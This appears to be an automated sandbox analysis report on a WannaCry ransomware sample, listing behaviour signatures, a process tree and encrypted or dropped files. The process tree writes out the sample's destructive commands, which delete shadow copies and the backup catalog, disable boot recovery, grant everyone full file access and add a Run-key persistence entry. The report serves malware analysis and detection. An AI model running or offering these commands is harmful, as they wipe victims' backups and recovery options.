Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\ywepvofkuzu108\taskse.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\ywepvofkuzu108\taskse.exeProcess information set: NOOPENFILEERRORBOX
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeCode function: 14_2_004067F0 IsIconic,#470,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,#755,#2379,14_2_004067F0
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeCode function: 18_1_004067F0 IsIconic,#470,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,#755,#2379,18_1_004067F0
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\ProgramData\ywepvofkuzu108\taskse.exeCode function: 21_2_00401000 Sleep,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,AdjustTokenPrivileges,_local_unwind2,CreateProcessAsUserA,WaitForSingleObject,_local_unwind2,21_2_00401000
Creates files inside the volume driver (system volume information)
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\System Volume Information\~SD8733.tmp
May use the Tor software to hide its network traffic
Source: taskhsvc.exeBinary or memory string: onion-port
Uses cacls to modify the permissions of files
Source: unknownProcess created: C:\Windows\System32\icacls.exe icacls . /grant Everyone:F /T /C /Q

Lowering of HIPS / PFW / Operating System Security Settings:

Overwrites Mozilla Firefox settings
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile written: C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\revocations.txt.WNCRYT
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile written: C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\cert8.db.WNCRYT
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile written: C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\key3.db.WNCRYT
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile written: C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\prefs.js.WNCRYT
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile written: C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\secmod.db.WNCRYT
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile written: C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\sessionstore.js.WNCRYT
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile written: C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\sessionstore-backups\previous.js.WNCRYT
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile written: C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\cert_override.txt.WNCRYT
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile written: C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\SiteSecurityServiceState.txt.WNCRYT

Language, Device and Operating System Detection:

Contains functionality to query local / system time
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exeCode function: 19_2_0032FC04 GetSystemTimeAsFileTime,exit,__stack_chk_fail,19_2_0032FC04
Contains functionality to query the account / user name
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeCode function: 5_2_10004F20 swprintf,swprintf,MultiByteToWideChar,CopyFileW,CopyFileW,GetUserNameW,_wcsicmp,SystemParametersInfoW,swprintf,CopyFileW,5_2_10004F20
Contains functionality to query time zone information
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeCode function: 14_2_00406F80 SendMessageA,CreateSolidBrush,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateFontA,CreateFontA,#1641,CreateFontA,#1641,CreateFontA,#1641,#3092,SendMessageA,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#860,#537,#537,#540,#2818,#535,#2818,#535,SendMessageA,SendMessageA,#6140,#6140,GetTimeZoneInformation,SystemTimeToTzSpecificLocalTime,SystemTimeToTzSpecificLocalTime,#2818,SystemTimeToTzSpecificLocalTime,#2818,#6334,#800,14_2_00406F80
Queries the cryptographic machine GUID
Source: C:\mssecsvc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Contains functionality to query locales information (e.g. system language)
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeCode function: SendMessageA,GetUserDefaultLangID,GetLocaleInfoA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,14_2_00406C20
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeCode function: SendMessageA,GetUserDefaultLangID,GetLocaleInfoA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,18_1_00406C20
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cscript.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cscript.exeQueries volume information: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe VolumeInformation

Behavior Graph

[Behavior graph image not reproduced. Behavior Graph ID: 269081; Sample: mssecsvc.exe; Startdate: 12/05/2017; Architecture: WINDOWS; Score: 100]

Yara Overview

No Yara matches

Startup

  • system is w7_1
  • mssecsvc.exe (PID: 3048 cmdline: 'C:\mssecsvc.exe' MD5: DB349B97C37D22F5EA1D1841E3C89EB4)
    • tasksche.exe (PID: 3216 cmdline: C:\WINDOWS\tasksche.exe /i MD5: 84C82835A5D21BBCF75A61706D8AB549)
  • mssecsvc.exe (PID: 3164 cmdline: C:\mssecsvc.exe -m security MD5: DB349B97C37D22F5EA1D1841E3C89EB4)
  • cmd.exe (PID: 3232 cmdline: cmd.exe /c 'C:\ProgramData\ywepvofkuzu108\tasksche.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
    • tasksche.exe (PID: 3240 cmdline: C:\ProgramData\ywepvofkuzu108\tasksche.exe MD5: 84C82835A5D21BBCF75A61706D8AB549)
      • attrib.exe (PID: 3248 cmdline: attrib +h . MD5: 459A5755AFBB1CB3E67CA4C1296599E3)
      • icacls.exe (PID: 3256 cmdline: icacls . /grant Everyone:F /T /C /Q MD5: 1542A92D5C6F7E1E80613F3466C9CE7F)
      • taskdl.exe (PID: 3320 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
      • cmd.exe (PID: 3336 cmdline: C:\Windows\system32\cmd.exe /c 239891494608079.bat MD5: AD7B9C14083B52BC532FBA5948342B98)
        • cscript.exe (PID: 3356 cmdline: cscript.exe //nologo m.vbs MD5: A3A35EE79C64A640152B3113E6E254E2)
      • @WanaDecryptor@.exe (PID: 3408 cmdline: @WanaDecryptor@.exe co MD5: 7BF2B57F2A205768755C07F238FB32CC)
        • taskhsvc.exe (PID: 3500 cmdline: TaskData\Tor\taskhsvc.exe MD5: FE7EB54691AD6E6AF77F8A9A0B6DE26D)
      • cmd.exe (PID: 3416 cmdline: cmd.exe /c start /b @WanaDecryptor@.exe vs MD5: AD7B9C14083B52BC532FBA5948342B98)
        • @WanaDecryptor@.exe (PID: 3456 cmdline: @WanaDecryptor@.exe vs MD5: 7BF2B57F2A205768755C07F238FB32CC)
          • cmd.exe (PID: 3628 cmdline: cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet MD5: AD7B9C14083B52BC532FBA5948342B98)
            • vssadmin.exe (PID: 3660 cmdline: vssadmin delete shadows /all /quiet MD5: 6E248A3D528EDE43994457CF417BD665)
            • WMIC.exe (PID: 3776 cmdline: wmic shadowcopy delete MD5: A03CF3838775E0801A0894C8BACD2E56)
            • bcdedit.exe (PID: 3804 cmdline: bcdedit /set {default} bootstatuspolicy ignoreallfailures MD5: ABD373E82F6240031C1E631AA20711C7)
            • bcdedit.exe (PID: 3812 cmdline: bcdedit /set {default} recoveryenabled no MD5: ABD373E82F6240031C1E631AA20711C7)
            • wbadmin.exe (PID: 3824 cmdline: wbadmin delete catalog -quiet MD5: EAB630E7E6A7FC248870A2FCDC098B98)
      • taskse.exe (PID: 3516 cmdline: taskse.exe C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe MD5: 8495400F199AC77853C53B5A3F278F3E)
        • @WanaDecryptor@.exe (PID: 3568 cmdline: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
      • cmd.exe (PID: 3528 cmdline: cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v 'ywepvofkuzu108' /t REG_SZ /d '\'C:\ProgramData\ywepvofkuzu108\tasksche.exe\'' /f MD5: AD7B9C14083B52BC532FBA5948342B98)
        • reg.exe (PID: 3584 cmdline: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v 'ywepvofkuzu108' /t REG_SZ /d '\'C:\ProgramData\ywepvofkuzu108\tasksche.exe\'' /f MD5: D69A9ABBB0D795F21995C2F48C1EB560)
      • taskdl.exe (PID: 3548 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
      • taskdl.exe (PID: 3900 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
      • taskse.exe (PID: 3908 cmdline: taskse.exe C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe MD5: 8495400F199AC77853C53B5A3F278F3E)
  • wbengine.exe (PID: 3872 cmdline: C:\Windows\system32\wbengine.exe MD5: 691E3285E53DCA558E1A84667F13E15A)
  • vdsldr.exe (PID: 3928 cmdline: C:\Windows\System32\vdsldr.exe -Embedding MD5: A2551668C78CEA4089D71A0A3B36FC0C)
  • cleanup

Created / dropped Files

File Path | Type and Hashes | Malicious
C:\@Please_Read_Me@.txt
  • Type: data
false
C:\@WanaDecryptor@.exe
  • Type: PE32 executable (GUI) Intel 80386, for MS Windows
true
C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\User Account Pictures\@Please_Read_Me@.txt
  • Type: data
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\@Please_Read_Me@.txt
  • Type: data
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile10.bmp.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile11.bmp.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile12.bmp.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile13.bmp.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile14.bmp.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile15.bmp.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile16.bmp.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile17.bmp.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile18.bmp.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile19.bmp.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile20.bmp.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile21.bmp.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile22.bmp.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile23.bmp.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile24.bmp.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile25.bmp.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile26.bmp.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile27.bmp.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile28.bmp.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile29.bmp.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile30.bmp.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile31.bmp.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile32.bmp.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile33.bmp.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile34.bmp.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile35.bmp.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile36.bmp.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile37.bmp.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile38.bmp.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile39.bmp.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile40.bmp.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile41.bmp.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile42.bmp.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile43.bmp.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile44.bmp.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\User Account Pictures\guest.bmp.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\User Account Pictures\user.bmp.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\WelcomeFax.tif.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\Windows NT\MSScan\@Please_Read_Me@.txt
  • Type: data
false
C:\ProgramData\Microsoft\Windows NT\MSScan\@WanaDecryptor@.exe.lnk
  • Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri May 12 16:54:39 2017, mtime=Fri May 12 16:54:39 2017, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
true
C:\ProgramData\Microsoft\Windows NT\MSScan\WelcomeScan.jpg.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\Windows\Caches\@Please_Read_Me@.txt
  • Type: data
false
C:\ProgramData\Microsoft\Windows\Caches\cversions.2.db.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\Windows\Caches\{67D69890-D853-4011-A87E-AA64FA83CE5A}.2.ver0x0000000000000002.db.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000007.db.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000b.db.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\Windows\Caches\{86012F79-362C-43D2-98EF-AB58A0A31343}.2.ver0x0000000000000001.db.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\Windows\Ringtones\@Please_Read_Me@.txt
  • Type: data
false
C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 01.wma.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 02.wma.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 03.wma.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 04.wma.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 05.wma.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 06.wma.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 07.wma.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 08.wma.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 09.wma.WNCRYT
  • Type: data
false
C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 10.wma.WNCRYT
  • Type: data
false
C:\ProgramData\ywepvofkuzu108\00000000.eky
  • Type: data
false
C:\ProgramData\ywepvofkuzu108\00000000.pky
  • Type: b.out overlay separate object file V3.0 Large Data
false
C:\ProgramData\ywepvofkuzu108\00000000.res
  • Type: FoxPro FPT, blocks size 31522, next free block index 2979510575
false
C:\ProgramData\ywepvofkuzu108\239891494608079.bat
  • Type: DOS batch file, ASCII text, with CRLF, CR line terminators
false
C:\ProgramData\ywepvofkuzu108\@Please_Read_Me@.txt
  • Type: data
false
C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe
  • Type: PE32 executable (GUI) Intel 80386, for MS Windows
true
C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe.lnk
  • Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri May 12 16:54:39 2017, mtime=Fri May 12 16:54:39 2017, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
true
C:\ProgramData\ywepvofkuzu108\TaskData\Tor\libeay32.dll
  • Type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
false
C:\ProgramData\ywepvofkuzu108\TaskData\Tor\libevent-2-0-5.dll
  • Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
false
C:\ProgramData\ywepvofkuzu108\TaskData\Tor\libevent_core-2-0-5.dll
  • Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
false
C:\ProgramData\ywepvofkuzu108\TaskData\Tor\libevent_extra-2-0-5.dll
  • Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
false
C:\ProgramData\ywepvofkuzu108\TaskData\Tor\libgcc_s_sjlj-1.dll
  • Type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
false
C:\ProgramData\ywepvofkuzu108\TaskData\Tor\libssp-0.dll
  • Type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
false
C:\ProgramData\ywepvofkuzu108\TaskData\Tor\ssleay32.dll
  • Type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
false
C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exe
  • Type: PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
true
C:\ProgramData\ywepvofkuzu108\TaskData\Tor\tor.exe
  • Type: PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
true
C:\ProgramData\ywepvofkuzu108\TaskData\Tor\zlib1.dll
  • Type: PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
false
C:\ProgramData\ywepvofkuzu108\b.wnry
  • Type: PC bitmap, Windows 3.x format, 800 x 600 x 24
false
C:\ProgramData\ywepvofkuzu108\c.wnry
  • Type: data
false
C:\ProgramData\ywepvofkuzu108\f.wnry
  • Type: ASCII text, with CRLF line terminators
false
C:\ProgramData\ywepvofkuzu108\m.vbs
  • Type: ASCII text, with CRLF line terminators
true
C:\ProgramData\ywepvofkuzu108\msg\m_bulgarian.wnry
  • Type: Rich Text Format data, version 1, unknown character set
false
C:\ProgramData\ywepvofkuzu108\msg\m_chinese (simplified).wnry
  • Type: Rich Text Format data, version 1, unknown character set
false
C:\ProgramData\ywepvofkuzu108\msg\m_chinese (traditional).wnry
  • Type: Rich Text Format data, version 1, unknown character set
false
C:\ProgramData\ywepvofkuzu108\msg\m_croatian.wnry
  • Type: Rich Text Format data, version 1, unknown character set
false
C:\ProgramData\ywepvofkuzu108\msg\m_czech.wnry
  • Type: Rich Text Format data, version 1, unknown character set
false
C:\ProgramData\ywepvofkuzu108\msg\m_danish.wnry
  • Type: Rich Text Format data, version 1, unknown character set
false
C:\ProgramData\ywepvofkuzu108\msg\m_dutch.wnry
  • Type: Rich Text Format data, version 1, unknown character set
false
C:\ProgramData\ywepvofkuzu108\msg\m_english.wnry
  • Type: Rich Text Format data, version 1, unknown character set
false
C:\ProgramData\ywepvofkuzu108\msg\m_filipino.wnry
  • Type: Rich Text Format data, version 1, unknown character set
false
C:\ProgramData\ywepvofkuzu108\msg\m_finnish.wnry
  • Type: Rich Text Format data, version 1, unknown character set
false
C:\ProgramData\ywepvofkuzu108\msg\m_french.wnry
  • Type: Rich Text Format data, version 1, unknown character set
false
C:\ProgramData\ywepvofkuzu108\msg\m_german.wnry
  • Type: Rich Text Format data, version 1, unknown character set
false
C:\ProgramData\ywepvofkuzu108\msg\m_greek.wnry
  • Type: Rich Text Format data, version 1, unknown character set
false
C:\ProgramData\ywepvofkuzu108\msg\m_indonesian.wnry
  • Type: Rich Text Format data, version 1, unknown character set
false
C:\ProgramData\ywepvofkuzu108\msg\m_italian.wnry
  • Type: Rich Text Format data, version 1, unknown character set
false
C:\ProgramData\ywepvofkuzu108\msg\m_japanese.wnry
  • Type: Rich Text Format data, version 1, unknown character set
false
C:\ProgramData\ywepvofkuzu108\msg\m_korean.wnry
  • Type: Rich Text Format data, version 1, unknown character set
false
C:\ProgramData\ywepvofkuzu108\msg\m_latvian.wnry
  • Type: Rich Text Format data, version 1, unknown character set
false
C:\ProgramData\ywepvofkuzu108\msg\m_norwegian.wnry
  • Type: Rich Text Format data, version 1, unknown character set
false
C:\ProgramData\ywepvofkuzu108\msg\m_polish.wnry
  • Type: Rich Text Format data, version 1, unknown character set
false
C:\ProgramData\ywepvofkuzu108\msg\m_portuguese.wnry
  • Type: Rich Text Format data, version 1, unknown character set
false
C:\ProgramData\ywepvofkuzu108\msg\m_romanian.wnry
  • Type: Rich Text Format data, version 1, unknown character set
false
C:\ProgramData\ywepvofkuzu108\msg\m_russian.wnry
  • Type: Rich Text Format data, version 1, unknown character set
false
C:\ProgramData\ywepvofkuzu108\msg\m_slovak.wnry
  • Type: Rich Text Format data, version 1, unknown character set
false
C:\ProgramData\ywepvofkuzu108\msg\m_spanish.wnry
  • Type: Rich Text Format data, version 1, unknown character set
false
C:\ProgramData\ywepvofkuzu108\msg\m_swedish.wnry
  • Type: Rich Text Format data, version 1, unknown character set
false
C:\ProgramData\ywepvofkuzu108\msg\m_turkish.wnry
  • Type: Rich Text Format data, version 1, unknown character set
false
C:\ProgramData\ywepvofkuzu108\msg\m_vietnamese.wnry
  • Type: Rich Text Format data, version 1, unknown character set
false
C:\ProgramData\ywepvofkuzu108\r.wnry
  • Type: ASCII text, with CRLF line terminators
false
C:\ProgramData\ywepvofkuzu108\s.wnry
  • Type: Zip archive data, at least v1.0 to extract
false
C:\ProgramData\ywepvofkuzu108\t.wnry
  • Type: data
false
C:\ProgramData\ywepvofkuzu108\taskdl.exe
  • Type: PE32 executable (GUI) Intel 80386, for MS Windows
false
C:\ProgramData\ywepvofkuzu108\tasksche.exe
  • Type: PE32 executable (GUI) Intel 80386, for MS Windows
true
C:\ProgramData\ywepvofkuzu108\taskse.exe
  • Type: PE32 executable (GUI) Intel 80386, for MS Windows
false
C:\ProgramData\ywepvofkuzu108\u.wnry
  • Type: PE32 executable (GUI) Intel 80386, for MS Windows
true
C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png.WNCRY (copy)
  • Type:
false
C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png.WNCRY (copy)
  • Type:
false
C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png.WNCRY (copy)
  • Type:
false
C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png.WNCRY (copy)
  • Type:
false
C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png.WNCRY (copy)
  • Type:
false
C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png.WNCRY (copy)
  • Type:
false
C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Windows.edb.WNCRY (copy)
  • Type:
false
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile10.bmp.WNCRY (copy)
  • Type:
false
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile11.bmp.WNCRY (copy)
  • Type:
false
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile12.bmp.WNCRY (copy)
  • Type:
false
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile13.bmp.WNCRY (copy)
  • Type:
false
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile14.bmp.WNCRY (copy)
  • Type:
false
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile15.bmp.WNCRY (copy)
  • Type:
false
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile16.bmp.WNCRY (copy)
  • Type:
false
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile17.bmp.WNCRY (copy)
  • Type:
false
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile18.bmp.WNCRY (copy)
  • Type:
false
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile19.bmp.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile20.bmp.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile21.bmp.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
